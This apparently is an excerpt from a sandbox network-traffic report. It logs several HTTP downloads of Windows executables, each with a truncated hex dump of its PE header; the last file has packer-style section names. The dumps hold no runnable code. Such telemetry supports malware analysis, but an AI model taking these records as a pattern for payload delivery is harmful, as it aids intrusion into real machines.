Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:58:17 GMTContent-Type: application/octet-streamContent-Length: 1902080Last-Modified: Thu, 27 Jun 2024 03:06:38 GMTConnection: keep-aliveETag: "667cd73e-1d0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 13 50 4a 58 72 3e 19 58 72 3e 19 58 72 3e 19 03 1a 3d 18 56 72 3e 19 03 1a 3b 18 f8 72 3e 19 8d 1f 3a 18 4a 72 3e 19 8d 1f 3d 18 4e 72 3e 19 8d 1f 3b 18 2d 72 3e 19 03 1a 3a 18 4c 72 3e 19 03 1a 3f 18 4b 72 3e 19 58 72 3f 19 8c 72 3e 19 c3 1c 37 18 59 72 3e 19 c3 1c c1 19 59 72 3e 19 c3 1c 3c 18 59 72 3e 19 52 69 63 68 58 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 57 59 50 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 c4 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4c 00 00 04 00 00 80 55 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 80 06 00 6a 00 00 00 00 70 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 cf 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 cf 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 06 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 76 6e 6f 71 70 77 72 00 00 1a 00 00 e0 31 00 00 f2 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6b 69 6b 68 6e 6e 6d 00 10 00 00 00 e0 4b 00 00 04 00 00 00 e0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4b 00 00 22 00 00 00 e4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
